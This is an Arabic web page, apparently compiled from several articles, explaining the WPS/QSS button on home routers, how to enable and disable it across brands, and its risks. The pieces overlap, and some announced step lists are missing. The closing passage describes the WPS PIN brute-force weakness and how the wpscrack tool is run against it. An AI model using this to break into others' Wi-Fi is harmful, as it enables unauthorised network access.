WPS على جهاز التوجيه - دعونا نتعرف على ما هو؟ زر WPS الموجود على جهاز التوجيه - ما هو وكيفية تكوين QSS أو EZSetup.

من المؤكد أن الكثير منكم قد انتبه إلى شيء غريب وغير واضح زر WPSعلى جهاز التوجيه. ما هو على أي حال، ماذا يعني وما هو الغرض منه؟ بالمناسبة، WPS ليس الاختصار الوحيد الذي يشير إلى هذه الوظيفة. على سبيل المثال، يطلق عليه TP-Link اسم QSS، وتطلق عليه شركة Asus الأقدم اسم EZSetup.

تقنية WPS اللاسلكية، أو "Wi-Fi Protected Setup"، هي وظيفة تقوم تلقائيًا بتكوين الاتصال بين جهاز التوجيه وجهاز يتصل بشبكة WiFi.

إنه موجود في جميع الموديلات الحديثة لأجهزة توجيه WiFi. يمكن العثور عليه أيضًا على محول wifi أو طابعة مزودة بوحدة لاسلكية. يمكن أن يكون زر WPS، الذي يتم دمجه غالبًا مع وظيفة إعادة الضبط، مفيدًا جدًا عند توصيل الأدوات الذكية المختلفة.

يتمثل جوهر التقنية في أن جهاز التوجيه يقوم بإنشاء إشارة مشفرة تحتوي على معلومات حول إعدادات الشبكة اللاسلكية، والتي يتم استقبالها لاسلكيًا بواسطة محول الاتصال.

زر QSS على TP-LINK

حتى وقت قريب، استخدمت TP-LINK اسمها الخاص على أجهزة التوجيه الخاصة بها “ QSS» (إعداد الأمان السريع). لذلك، لا فائدة من السؤال عن مكان وجود زر WPS على أجهزة التوجيه من هذه الشركة والتي تم إصدارها منذ عدة سنوات.

لكن نماذج TP-Link الجديدة تستخدم أيضًا الاسم الشائع "WPS". وكانت أجهزة توجيه ASUS تستخدم اختصارًا آخر - " EZSetup«.

ما فائدة زر WPS-Reset الموجود على جهاز التوجيه؟

في الواقع، يقوم زر WPS/Reset الموجود على جهاز التوجيه أو أي جهاز آخر بتنشيط هذه الوظيفة.

على سبيل المثال، قمت بشراء محول USB وتريد توصيل جهاز كمبيوتر محمول أو كمبيوتر بجهاز التوجيه الخاص بك. لكنك لا تعرف بالضبط كيفية تكوينه بشكل صحيح للاتصال بالشبكة. إما أنك لا تعرف كيفية القيام بذلك بعد، أو ببساطة ليس لديك كلمة مرور WiFi، ويتم إغلاق الوصول إلى لوحة الإدارة الخاصة بجهاز التوجيه.

ثم ستساعدنا وظيفة WPS، بشرط أن تكون هذه التقنية مدعومة بواسطة جهاز التوجيه والمحول. من السهل معرفة ذلك. يجب أن يكون لدى كلا الجهازين زر WPS مطابق على جسمهما لتنشيط هذا الوضع.

بنفس الطريقة تمامًا، يمكنك توصيل الأجهزة اللاسلكية الأخرى التي تدعم إعداد Wi-Fi المحمي بجهاز التوجيه - التلفزيون وكاميرات IP ومكبرات صوت wifi وأجهزة التخزين وما إلى ذلك.

كيفية توصيل محول WiFi بجهاز التوجيه عبر WPS-QSS؟

أسهل طريقة هي عندما يكون زر WPS أو QSS موجودًا فعليًا بشكل واضح على كل من جهاز التوجيه والمحول المتصل.

وفقًا لذلك، لتنشيط وظيفة الإعداد المحمي اللاسلكي، اضغط في نفس الوقت على هذا المفتاح الموجود على جهاز التوجيه ومحول wifi لبضع ثوانٍ. وننتظر حتى تومض أضواء المؤشر للإشارة إلى أنه تم إنشاء اتصال بينهما.

إذا تم دمج زر WPS مع زر RESET، فسيتم تنشيط وضع الاتصال بضغطة قصيرة. ولفترة طويلة - إعادة ضبط الإعدادات! لا تفرط في تعريضه، وإلا سيتم إعادة ضبط جهاز التوجيه.

ومع ذلك، إذا لم يكن هناك، فهذا لا يعني أن التكنولوجيا غير مدعومة. أقل شيوعاً، ولكن تحدث الحالات التالية:

زر WPS في Zyxel Keenetic

أولاً، عليك أن تقرر ما إذا كان وضع WPS ممكّنًا على جهاز التوجيه (إذا كان لديك حق الوصول إلى لوحة الإدارة بالطبع). هذا ما يبدو عليه هذا الإعداد على جهاز التوجيه Zyxel Keenetic (قسم القائمة "WiFi")

في لوحة إدارة Keenetic الجديدة، يمكنك إدخال التكوين الذي نحتاجه مباشرة من شاشة البداية

وهنا انقر على "بدء WPS"

زر WPS-Reset على جهاز التوجيه TP-LINK (وظيفة QSS)

على جهاز توجيه TP-LINK، غالبًا ما يتم دمج زر WPS الموجود في العديد من الطرز مع وظيفة إعادة الضبط. في هذه الحالة، يؤدي الضغط لفترة قصيرة إلى تنشيط WPS، بينما يؤدي الضغط لفترة طويلة إلى إعادة ضبط الإعدادات.

إذا لم يكن الأمر كذلك، فإننا نبحث عن تمكين هذا الوضع في الإعدادات. انظر كيف يبدو في لوحة الإدارة

في الإصدارات السابقة كان يشار إليه باسم QSS. لكن الشركة المصنعة اليوم توصلت إلى مصطلحات مقبولة بشكل عام وتطلق عليها نفس اسم أي شخص آخر.

WPS على جهاز التوجيه Asus - برنامج EzSetup

تتوفر وظيفة WPS أيضًا على أجهزة توجيه Asus. وهنا الزر:

وهنا لقطة شاشة لتمكين WPS من لوحة التحكم. يرجى ملاحظة أنه يمكنك أيضًا تعيين رقم التعريف الشخصي (PIN) الخاص بك إذا كنت ترغب في ذلك.

إذا كان لديك طراز قديم، فمن المرجح أن ترى برنامجًا مثل EzSetup بدلاً من WPS. يقوم هذا الزر بتشغيل هذا التطبيق للتكوين السريع.

WPS في جهاز التوجيه Netis

نفس الشيء على Netis

بالمناسبة، على جهاز توجيه Netis، كما نرى، يمكنك أيضًا توصيل أي جهاز عبر WPS بكلمة مرور في الاتجاه المعاكس، أي عند تعيين كلمة المرور على الأداة نفسها ثم إدخالها في لوحة إدارة جهاز التوجيه. في بعض الأحيان يكون هذا ضروريًا أيضًا.

كيف يعمل WPS على دي لينك؟

وهذا ما تبدو عليه لوحة تكوين WPS على جهاز توجيه D-Link

لذلك، دعونا نقوم بتنشيط هذا الوضع وتطبيق التغييرات.

بعد ذلك، نجد زر WPS الموجود على جهاز التوجيه وعلى الجهاز الثاني ونضغط عليهما لفترة وجيزة في نفس الوقت - سيستغرق تبادل الإشارة بضع ثوانٍ فقط، لذا يجب أن يعملا في نفس الوقت.

غالبًا ما يتم دمج زر WPS مع وظيفة إعادة الضبط "إعادة الضبط"، لذلك تحتاج إلى الضغط عليه ثم تحريره على الفور - سيؤدي الضغط عليه لفترة طويلة إلى إعادة الضبط وإعادة التشغيل بالكامل.

زر WPS على محول واي فاي ومكرر

سأقدم لك الآن بعض الأمثلة من الأدوات الذكية الأخرى. هذا هو الشكل الذي قد يبدو عليه زر WPS الموجود على محول wifi

وهنا على محول Edimax

في الصورة التالية سنرى مفتاحًا مشابهًا على جسم مضخم الإشارة

كيفية الاتصال بشبكة WiFi عبر WPS من جهاز كمبيوتر يعمل بنظام Windows 10؟

لنقم الآن بتوصيل جهاز كمبيوتر محمول أو كمبيوتر يعمل بنظام Windows 10 بجهاز التوجيه باستخدام تقنية WPS. بالمناسبة، كل شيء يعمل بنفس الطريقة تمامًا على نظام التشغيل Windows 7، والفرق الوحيد سيكون في العرض المرئي.

لذا، انقر على أيقونة WiFi في لوحة Windows وابحث عن شبكتك في القائمة

نرى أنه للاتصال يمكنك إما إدخال كلمة مرور أو استخدام تقنية WPS. في هذه الحالة، بالطبع، يجب أن يكون الوضع نشطًا على جهاز التوجيه. لقد كتبت بالفعل أعلاه حول كيفية التحقق من ذلك.

الآن نضغط لفترة وجيزة على زر QSS الميكانيكي (أو WPS) الموجود على جهاز التوجيه، وبعد ذلك سيتصل الكمبيوتر المحمول بشبكة WiFi نفسها.

أخيرًا، أود أن أشير إلى أنه إذا تم تشغيل WPS دائمًا على جهاز توجيه WiFi، فهناك خطر تعرض شبكتك للاختراق من قبل أشخاص سيئين. على سبيل المثال، من خلال برنامج WPS Connect للهاتف المحمول. لذلك، بعد توصيل جهازك، قم بإيقاف تشغيل WPS/QSS في لوحة إدارة جهاز التوجيه.

كيفية تعطيل WPS على جهاز التوجيه؟

وفقًا لذلك، لتعطيل WPS على جهاز التوجيه، يجب عليك أيضًا الانتقال إلى اللوحة الخاصة به وإلغاء تنشيط هذه الوظيفة. يقع الإعداد في نفس المكان الذي أظهرته فيه، حيث يتم تشغيله. في كل نموذج يتم تعيين هذا القسم بشكل مختلف.

يعد اختصار WPS الموجود على جهاز التوجيه بمثابة اختصار لـ "Wi-Fi Protected Setup". تم إنشاء هذه التقنية لتبسيط اتصال الأجهزة المختلفة بالشبكة. وهو مدعوم من قبل جميع أجهزة التوجيه تقريبًا. ميزته الرئيسية هي أنه ليس عليك إدخال كلمة مرور على هاتفك أو الكمبيوتر المحمول للاتصال. وينطبق هذا بشكل خاص عندما تنسى كلمة مرور Wi-Fi الخاصة بك، ولا يمكن البحث في إعدادات جهاز التوجيه. ستصف المقالة عمل هذه التقنية بالتفصيل، وستقدم أيضًا تعليمات لاستخدامها.

كيف يعمل وضع WPS

الآن بعد أن اكتشفنا ما هو WPS، يجدر الحديث عن خوارزمية هذه التكنولوجيا. لإنشاء شبكة لاسلكية، يحتاج المستخدم إلى تكوين نقطة وصول جهاز التوجيه والاتصال بالشبكة المحلية لجهازه عن طريق إدخال كلمة مرور الأمان.

يعمل WPS على تبسيط هذا الإجراء إلى حد كبير. تقوم وحدة التحكم بإنشاء كلمة مرور عشوائية تلقائيًا ثم تنقلها إلى الجهاز الذي يتصل بالشبكة عبر إعداد Wi-Fi المحمي. بفضل هذا، لا يتعين عليك البحث بشكل مستقل عن شبكتك من بين شبكات أخرى وإدخال كلمة المرور يدويًا

يتم دعم بروتوكول WPS بواسطة أنظمة تشغيل Windows ومعظم الأجهزة المحمولة التي تعمل بنظام التشغيل Android OS. في أنظمة التشغيل التي لا تحتوي على أدوات مساعدة مدمجة، يمكنك تنزيل برنامج تشغيل خاص يعمل على توسيع وظائف النظام.

استخدام WPS (QSS) على جهاز التوجيه

يمكنك توصيل الأجهزة بجهاز التوجيه باستخدام WPS إما الأجهزة أو البرامج. كل هذا يتوقف على الأداة التي تتصل بها بالشبكة اللاسلكية.

اتصال الأجهزة: ما هو وكيف يتم استخدامه

يتضمن الخيار الأول إجراءين فقط: تحتاج إلى الضغط على الأزرار ذات التعيين المقابل على جهاز التوجيه وعلى الأداة الذكية المتصلة. عادةً ما يوجد زر WPS الموجود على جهاز التوجيه على اللوحة الخلفية للجهاز.

في بعض الحالات، يتم دمج الزر مع وظيفة إعادة الضبط (RESET). إذا كنت لا ترغب في إعادة ضبط جهاز التوجيه على إعدادات المصنع، فلا تحتفظ به لأكثر من 5 ثوانٍ. سيُعلمك مؤشر الضوء المقابل الموجود على اللوحة الأمامية لجهاز التوجيه بتنشيط وظيفة WPS.

اتصال البرمجيات للهاتف المحمول/الكمبيوتر اللوحي

يتضمن نظام التشغيل Android وظيفة الاتصال عبر WPS. لاستخدامه اتبع التعليمات التالية وهي:

إذا تم كل شيء بشكل صحيح، فسوف يتصل الهاتف الذكي بشبكتك المحلية.

توصيل جهاز يعمل بنظام Windows

يمكنك استخدام Wi-Fi على الكمبيوتر المحمول الخاص بك بعد إنشاء اتصال بجهاز التوجيه عبر WPS. للقيام بذلك، عليك اتباع عدة خطوات:

إذا كنت بحاجة إلى تعطيل هذا البروتوكول على أجهزة التوجيه، فما عليك سوى الضغط على الزر (إذا لم يكن موجودًا، فيمكنك فقط تعطيل WPS على جهاز التوجيه من خلال الإعدادات).

ماذا تفعل إذا لم يكن هناك زر WPS على جهاز التوجيه: أمثلة على التنشيط

لا توفر العديد من الطرز تمكين الأجهزة لبروتوكول Wi-Fi Protected Setup. وهذا يعني أن الاتصال يحدث من خلال واجهة الويب. للقيام بذلك عليك القيام بما يلي:

بعد الانتهاء من هذه التلاعبات، ستتمكن من استخدام شبكة Wi-Fi دون أي مشاكل. غالبًا ما تتم الإشارة إلى مجموعة PIN المكونة من ثمانية أرقام على الملصق المرفق بعلبة المودم.

هناك خيار بديل لتوصيل الأجهزة المحمولة:

عند إدخال المجموعة الصحيحة، سيتم توصيل هاتفك المحمول أو جهازك اللوحي بالشبكة. تتيح لك هذه الوظيفة توصيل أي أجهزة تدعم هذا البروتوكول بشبكة Wi-Fi.

كيفية تعطيل WPS من خلال الإعدادات

لإلغاء التنشيط، تحتاج إلى النقر فوق الزر "تعطيل" في القسم المقابل من جهاز التوجيه أو تحديد العنصر معطل.

مرحبًا! قررت أن أتحدث عن التكنولوجيا اليوم WPS (QSS) ، سأقول لك نفس الشيء ما هو زر QSS الموجود على جهاز توجيه Wi-Fi؟وكيفية وضعها موضع التنفيذ. يبدو لي أن جميع أجهزة التوجيه الحديثة لديها الآن تقنية WPS (QSS)، وبالتالي فإن المعلومات ذات صلة. في جهاز التوجيه TL-WR841N الخاص بي، وفي أجهزة التوجيه TP-Link بشكل عام، تسمى هذه الوظيفة QSS.

QSS أو WPS هي تقنية تسمح لك بإنشاء اتصال Wi-Fi لاسلكي بشكل شبه تلقائي بين جهاز التوجيه الخاص بك والجهاز الذي تريد توصيله بالشبكة.

تم فك شفرتها على النحو التالي:

WPS - إعداد محمي بتقنية Wi-Fi
QSS – إعداد الأمان السريع

والآن أصف ذلك بكلماتي الخاصة. على سبيل المثال، يأتي الضيوف إليك ويريدون الاتصال بشبكة Wi-Fi الخاصة بك. ماذا تفعل عادة؟ ابحث عن كلمة مرور Wi-Fi، ثم ستحتاج إلى إدخالها على الجهاز وهذه هي الطريقة الوحيدة للاتصال. وتعمل تقنية QSS على تبسيط هذا الإجراء.

ما عليك سوى العثور على شبكتك على الجهاز، وتحديد WPS في الإعدادات الإضافية والضغط على زر "Puch" (لدي هذا على هاتفي)، ثم انقر فوق اتصال، وعلى جهاز التوجيه اضغط على الزر QSS. تتبادل الأجهزة رمز PIN وتتصل ببعضها البعض. كما ترون، كل شيء مناسب، لا تحتاج إلى إدخال أي شيء. لقد فحصته بنفسي، كل شيء يعمل بشكل جيد.

والآن سأكتب بمزيد من التفصيل:

• كيفية تمكين (تعطيل) QSS على جهاز توجيه TP-Link.
• كيفية توصيل جهاز (هاتف) بجهاز توجيه Wi-Fi باستخدام تقنية QSS
• ما هي مخاطر استخدام تقنية WPS (QSS)؟

كيفية تمكين/تعطيل QSS على جهاز توجيه TP-Link؟

عندما كتبت مقالا عن الإعداد، ذكرت زر QSS، على هذا الموجه يبدو كما يلي:

على الفور، قبل أن أنسى، أريد أن أعطي إجابة لأولئك الذين يسألون: إذا قمت بالنقر فوق زر QSS هذا، فهل يعني ذلك أن الجميع سيكونون قادرين على الاتصال بجهاز التوجيه الخاص بي؟ الجواب هو لا، هذا الزر يعمل فقط عندما تضغط عليه، ولفترة من الوقت بعد الضغط عليه (ليس لفترة طويلة)، وفي تلك اللحظة تقوم بتوصيل هاتفك أو جهازك اللوحي. تستغرق عملية الاتصال وتبادل رمز PIN بضع ثوانٍ فقط.

يمكن تمكين أو تعطيل وظيفة QSS في إعدادات جهاز التوجيه. مباشرة بعد إعداد جهاز التوجيه، تم تمكين هذه التقنية بالنسبة لي، ولا تزال تعمل. لتمكين أو تعطيل بروتوكول QSS، أو إنشاء رمز PIN جديد، وكذلك لإضافة جهاز جديد من لوحة تحكم جهاز التوجيه، عليك الذهاب إلى إعدادات جهاز التوجيه.

لقد كتبت بالفعل عدة مرات كيفية القيام بذلك، اكتب العنوان 192.168.1.1 في شريط عنوان المتصفح، وأدخل تسجيل الدخول وكلمة المرور للوصول إلى الإعدادات (المسؤول والمسؤول افتراضيًا) وتأكيد تسجيل الدخول.

ثم على اليسار انتقل إلى علامة التبويب "QSS"، سيتم فتح الصفحة "QSS (الإعداد السريع والآمن)". إذا كانت لديك حالة QSS المعاكسة: ممكّن، فهذا يعني أن التقنية ممكّنة، لتعطيل QSS، انقر فوق الزر "تعطيل QSS". وبناءً على ذلك، إذا تم تعطيله، فلتمكينه، عليك الضغط على الزر "ممكّن".

كيفية توصيل جهاز بجهاز توجيه Wi-Fi باستخدام تقنية QSS؟

سأوضح لك عملية الاتصال بجهاز التوجيه باستخدام تقنية QSS، باستخدام جهاز التوجيه WR841N وهاتف HTC One V كمثال.

نقوم بتشغيل Wi-Fi على الهاتف وننتظر حتى تظهر شبكتنا في القائمة. نضغط عليه وسيطالبنا الهاتف على الفور بإدخال كلمة المرور. لكننا نختار "خيارات متقدمة"، ثم زر "WPS" و"Push". في هذه اللحظة، اضغط باستمرار على زر QSS الموجود على جهاز التوجيه، وعلى الهاتف انقر فوق "اتصال". هذا كل شيء، سوف يتصل الهاتف بجهاز التوجيه، ويمكنك تحرير الزر الموجود على جهاز التوجيه.

ما هي مخاطر استخدام تقنية WPS (QSS)؟

هناك نقاط ضعف وأصدقاء وهناك خطر من اختراق شبكتك عبر QSS. من حيث المبدأ، من المستحيل حماية شبكة Wi-Fi الخاصة بك بشكل كامل، ولكن تمكين QSS يزيد فقط من خطر الاختراق.

ونصيحتي لك هي أنه إذا كنت نادرًا ما تقوم بتوصيل أجهزة جديدة بجهاز التوجيه الخاص بك، فمن الأفضل تعطيل بروتوكول QSS، فأنت لا تحتاج إليه عمليًا. حسنًا، إذا كنت تقوم في كثير من الأحيان بتوصيل أجهزة جديدة، فاستخدم QSS ولا تفكر في الأشياء السيئة :)، أحيانًا. إذا كنت مرتاحًا لهذه التكنولوجيا، فلا يجب أن تتخلى عنها. حظ سعيد!

أيضا على الموقع:

ما هي QSS وWPS؟ ما هو زر QSS الموجود على جهاز توجيه Wi-Fi وكيفية استخدامه؟تم التحديث: 3 مارس 2014 بواسطة: مسؤل

إذا كان جهاز توجيه Wi-Fi أو نقطة الوصول يحتوي على زر WPS، فلن يُطلب من المستخدم في هذه الحالة إعداد شبكة لاسلكية. بالضغط على زر WPS الموجود على جهاز التوجيه لمدة 3-5 ثواني، ثم على محول Wi-Fi الخاص بجهاز المشترك، سنتلقى اتصالاً بين الجهاز وجهاز التوجيه.

لا يمكن تغيير اسم الشبكة، ويتم إنشاء قيمة كلمة المرور بشكل عشوائي. سنلقي نظرة على طريقة أخرى تسمح لك بتعيين القيم بنفسك. بالطريقة التي يطلبها المستخدم.

زر WPS على جهاز التوجيه

لكن أولاً، دعونا ندرج ما هو مطلوب بالضبط للطريقة التي تمت مناقشتها أعلاه. أولا، يجب أن يكون زر WPS موجودا على جهاز التوجيه. يجب أن يكون هناك خيار مماثل في جهاز المشترك (يمكن أن يكون "الزر" جهازًا أو برنامجًا).

ويجب أيضًا تفعيل خيار "WPS" في جهاز التوجيه. عادةً ما يتم تكوين هذه الفئة من الأجهزة من واجهة الويب. سنلقي نظرة على مثال (كيفية تمكين WPS في أجهزة توجيه TP-Link).

وشيء أخير. في العديد من نماذج أجهزة التوجيه اللاسلكية، يتم دمج زر WPS مع زر إعادة الضبط. وهذا يتبع القاعدة التي نعطيها أدناه.

من المهم أن تعرف: عند الضغط على زر WPS الموجود على جهاز التوجيه، يمكنك الاحتفاظ به لمدة لا تزيد عن 5 ثوانٍ. وإلا فإننا سنحصل على "إعادة ضبط المصنع" للإعدادات، ولا شيء أكثر من ذلك.

طرق الاتصال المختلفة باستخدام WPS

PBC، أو الضغط على زر الاتصال

في الواقع، تمت مناقشة هذه الطريقة بالفعل.

تسلسل الإجراءات هو كما يلي:

1. الضغط على زر WPS الموجود على جهاز التوجيه (تحتاج إلى الضغط عليه لمدة 3-5 ثوانٍ، ثم تحريره).
2. الضغط على زر WPS الموجود على جهاز المشترك (يكفي الضغط على الزر لمدة 2-3 ثواني).
3. وبعد حوالي دقيقة، سيتصل الجهاز بالشبكة اللاسلكية.

لكن إليكم عيوب هذه الطريقة التي تبدو بسيطة جداً للوهلة الأولى. تعرف على الشكل الذي تبدو عليه كلمة مرور Wi-Fi الناتجة ("التي تم إنشاؤها" بواسطة الأجهزة نفسها):

نتيجة إنشاء اتصال باستخدام طريقة PCB

لاحظ أنه بين الخطوتين "1" و"2" يجب ألا يمر أكثر من دقيقة واحدة.

الاتصال باستخدام رمز PIN لجهاز التوجيه

تعمل هذه الطريقة فقط على نظام التشغيل Windows 7 أو Vista مع حزمة الخدمة الثانية.

عند تشغيل جهاز التوجيه بالكامل (بعد دقيقة واحدة من تشغيله)، تحتاج إلى البحث عن شبكة Wi-Fi بالاسم المناسب. يعتبر مثال لأجهزة التوجيه Tenda:

بحث الشبكة

مقابل الشبكة المطلوبة سيكون هناك مربع اختيار "الاتصال تلقائيًا" وزر "الاتصال" (انقر فوقه).

نظرًا لعدم تكوين تشفير Wi-Fi في جهاز التوجيه، سيطالبك النظام بإنشاء وتعيين كلمة مرور (وفي نفس الوقت اسم شبكة جديد). انقر فوق الزر "موافق" واتبع تعليمات "المعالج":

ابدأ الإعداد

أولاً، ستحتاج إلى تقديم رمز PIN الخاص بجهاز التوجيه (يمكن العثور على القيمة على الملصق الموجود في الجزء السفلي من العلبة). ثم أدخل اسمًا وكلمة مرور، ثم حدد طريقة التشفير:

معالج إعداد شبكة WPS

بالنقر على "إغلاق"، نحصل على شبكة لاسلكية متاحة لجميع المشتركين (تظل الشبكة بالاسم وكلمة المرور التي تم تعيينها). في مثالنا: الاسم – “Home_Network”، كلمة المرور – 1fx2-ufge-198g. كما ترون، لا يتم استخدام زر WPS الموجود على جهاز التوجيه في هذه الحالة.

إعداد سعيد!

المتطلبات الأساسية لإعداد شبكة عبر WPS

كيف ينبغي تكوين بطاقة شبكة الكمبيوتر

بغض النظر عن طريقة الاتصال (أي خوارزمية إنشاء شبكة جديدة باستخدام WPS)، يتم تكوين بطاقة الشبكة في جهاز المشترك على النحو التالي. سيتلقى الجهاز عنوان IP "تلقائيًا"، بالإضافة إلى قيمة عنوان DNS.

لذلك، تم تكوين بطاقة الشبكة لـ IP وDNS "التلقائي". تحتوي معظم الأجهزة على هذا الإعداد افتراضيًا.

كيف ينبغي تكوين جهاز التوجيه

بادئ ذي بدء، يجب تشغيل الشبكة اللاسلكية في جهاز التوجيه أو نقطة الوصول. لاستخدام خيار WPS، بالإضافة إلى ذلك، تحتاج إلى "السماح" لجهاز التوجيه باستخدامه:

علامة التبويب WPS

تحتوي أجهزة التوجيه اللاسلكية TP-Link على علامة تبويب منفصلة تسمى "WPS". تأكد من تمكين الخيار (يمكنك تعطيله إذا لزم الأمر). بالمناسبة، يمكنك تعيين قيمة رمز PIN الخاص بك (بالنقر فوق الزر "إنشاء رمز PIN جديد").

ليس من الضروري تغيير رمز PIN؛ فقيمته لا تؤثر على الأمان. وعند الاتصال بطريقة PCB، لا يتم استخدام هذا الرمز (انظر المثال في الفيديو):

منذ وقت ليس ببعيد، بدا أن الشبكة اللاسلكية المحمية باستخدام تقنية WPA2 كانت آمنة تمامًا. من الممكن حقًا العثور على مفتاح بسيط للاتصال. ولكن إذا قمت بتثبيت مفتاح طويل حقًا، فلن تساعدك جداول قوس قزح ولا حتى تسريع GPU في إصلاحه. ولكن، كما اتضح فيما بعد، يمكنك الاتصال بشبكة لاسلكية بدون ذلك - من خلال الاستفادة من الثغرة الأمنية المكتشفة مؤخرًا في بروتوكول WPS.

تحذير

يتم تقديم جميع المعلومات للأغراض التعليمية فقط. يمكن بسهولة اعتبار اختراق الشبكة اللاسلكية الخاصة بشخص آخر جريمة جنائية. فكر برأسك.

ثمن التبسيط

هناك عدد أقل من نقاط الوصول المفتوحة التي لا تحتاج إلى إدخال مفتاح للاتصال بها على الإطلاق. يبدو أنه سيتم إدراجهم قريبًا في الكتاب الأحمر. إذا كان الشخص في السابق قد لا يعرف حتى أن الشبكة اللاسلكية يمكن قفلها بمفتاح، مما يحمي نفسه من الاتصالات الخارجية، فقد أصبح الآن يتم إخباره بشكل متزايد عن هذا الاحتمال. خذ، على سبيل المثال، البرامج الثابتة المخصصة التي يصدرها مقدمو الخدمات الرائدون لنماذج أجهزة التوجيه الشائعة لتبسيط عملية الإعداد. تحتاج إلى تحديد شيئين - تسجيل الدخول/كلمة المرور و... مفتاح لحماية الشبكة اللاسلكية. والأهم من ذلك، أن الشركات المصنعة للأجهزة نفسها تحاول جعل عملية الإعداد واضحة ومباشرة. وبالتالي، تدعم معظم أجهزة التوجيه الحديثة آلية WPS (الإعداد المحمي بتقنية Wi-Fi). بمساعدتها، يمكن للمستخدم إنشاء شبكة لاسلكية آمنة في غضون ثوانٍ، دون إزعاج نفسه على الإطلاق بحقيقة "تحتاج إلى تمكين التشفير في مكان آخر وتسجيل مفتاح WPA". لقد قمت بإدخال الرقم السري الرمزي المكون من ثمانية أرقام في النظام والمكتوب على جهاز التوجيه، وقد انتهيت! وهنا، تمسك جيداً. في ديسمبر/كانون الأول، تحدث باحثان عن عيوب أساسية خطيرة في بروتوكول WPS. إنه مثل الباب الخلفي لأي جهاز توجيه. اتضح أنه إذا تم تنشيط WPS عند نقطة الوصول (والتي يتم تمكينها للحظة في معظم أجهزة التوجيه افتراضيًا)، فيمكنك تحديد رمز PIN للاتصال واستخراج مفتاح الاتصال في غضون ساعات!

كيف يعمل نظام WPS؟

فكرة منشئي WPS جيدة. تقوم الآلية تلقائيًا بتعيين اسم الشبكة والتشفير. وبالتالي، لا يحتاج المستخدم للدخول إلى واجهة الويب والتعامل مع الإعدادات المعقدة. ويمكنك بسهولة إضافة أي جهاز (على سبيل المثال، جهاز كمبيوتر محمول) إلى شبكة تم تكوينها بالفعل: إذا قمت بإدخال رقم التعريف الشخصي بشكل صحيح، فسوف يتلقى جميع الإعدادات اللازمة. يعد هذا أمرًا مريحًا للغاية، ولهذا السبب يقدم جميع اللاعبين الرئيسيين في السوق (Cisco/Linksys وNetgear وD-Link وBelkin وBuffalo وZyXEL) الآن أجهزة توجيه لاسلكية تدعم WPS. دعونا ننظر إليها بمزيد من التفصيل.

هناك ثلاثة خيارات لاستخدام WPS:

1. اتصال بالضغط على الزر (PBC). يقوم المستخدم بالضغط على زر خاص على جهاز التوجيه (الجهاز) وعلى الكمبيوتر (البرنامج)، وبالتالي تنشيط عملية الإعداد. نحن لسنا مهتمين بهذا.
2. إدخال رمز PIN في واجهة الويب. يقوم المستخدم بالوصول إلى الواجهة الإدارية لجهاز التوجيه من خلال المتصفح وإدخال رمز PIN المكون من ثمانية أرقام والمكتوب على جسم الجهاز (الشكل 1)، وبعد ذلك تتم عملية الإعداد. هذه الطريقة أكثر ملاءمة للتكوين الأولي لجهاز التوجيه، لذلك لن نأخذها في الاعتبار أيضًا.
3. إدخال رمز PIN على جهاز الكمبيوتر الخاص بالمستخدم (الشكل 2). عند الاتصال بجهاز توجيه، يمكنك فتح جلسة WPS خاصة، يمكنك من خلالها تكوين جهاز التوجيه أو الحصول على الإعدادات الحالية إذا قمت بإدخال رمز PIN بشكل صحيح. وهذا جذاب بالفعل. لا يلزم المصادقة لفتح مثل هذه الجلسة. يمكن لأي شخص أن يفعل هذا! اتضح أن رمز PIN قد يكون بالفعل عرضة لهجوم وحشي. لكن هذه مجرد زهور.

وهن

كما أشرت سابقًا، يتكون رمز PIN من ثمانية أرقام - وبالتالي، هناك 10^8 (100,000,000) خيارات للمطابقة. ومع ذلك، يمكن تقليل عدد الخيارات بشكل كبير. الحقيقة هي أن الرقم الأخير من رمز PIN هو نوع من المجموع الاختباري، والذي يتم حسابه بناءً على الأرقام السبعة الأولى. ونتيجة لذلك، حصلنا بالفعل على 10^7 (10,000,000) من الخيارات. ولكن هذا ليس كل شيء! بعد ذلك، ننظر بعناية إلى جهاز بروتوكول مصادقة WPS (الشكل 3). يبدو الأمر كما لو أنه تم تصميمه خصيصًا لإفساح المجال للقوة الغاشمة. اتضح أن التحقق من رمز PIN يتم على مرحلتين. وهي مقسمة إلى قسمين متساويين، ويتم فحص كل جزء على حدة! دعونا نلقي نظرة على الرسم البياني:

1. إذا تلقى المهاجم، بعد إرسال رسالة M4، رسالة EAP-NACK ردًا على ذلك، فيمكنه التأكد من أن الجزء الأول من رمز PIN غير صحيح.
2. إذا تلقى EAP-NACK بعد إرسال M6، فإن الجزء الثاني من رمز PIN غير صحيح. نحصل على 10^4 (10000) خيارًا للنصف الأول و10^3 (1000) للنصف الثاني. ونتيجة لذلك، لدينا فقط 11000 خيار للبحث الكامل. لفهم كيفية عمل ذلك بشكل أفضل، انظر إلى الرسم البياني.
3. النقطة المهمة هي سرعة البحث الممكنة. وهي محدودة بالسرعة التي يعالج بها جهاز التوجيه طلبات WPS: ستنتج بعض نقاط الوصول نتائج كل ثانية، والبعض الآخر كل عشر ثوانٍ. يتم قضاء معظم الوقت في حساب المفتاح العام باستخدام خوارزمية Diffie-Hellman؛ ويجب إنشاؤه قبل الخطوة M3. يمكن تقليل الوقت المستغرق في ذلك عن طريق اختيار مفتاح سري بسيط من جانب العميل، مما سيبسط حسابات المفاتيح الأخرى في المستقبل. تظهر الممارسة أنه للحصول على نتيجة ناجحة، عادة ما يكون كافيا لتمرير نصف جميع الخيارات فقط، وفي المتوسط ​​\u200b\u200b، تستغرق القوة الغاشمة أربع إلى عشر ساعات فقط.

التنفيذ الأول

أول تطبيق ظهر للقوة الغاشمة كان الأداة المساعدة wpscrack (goo.gl/9wABj)، التي كتبها الباحث ستيفان فيبوك في بايثون. تستخدم الأداة المساعدة مكتبة Scapy، والتي تسمح لك بإدخال حزم الشبكة التعسفية. لا يمكن تشغيل البرنامج النصي إلا ضمن نظام Linux، بعد تحويل الواجهة اللاسلكية أولاً إلى وضع المراقبة. كمعلمات، يجب عليك تحديد اسم واجهة الشبكة في النظام، وعنوان MAC الخاص بالمحول اللاسلكي، بالإضافة إلى عنوان MAC الخاص بنقطة الوصول واسمها (SSID).

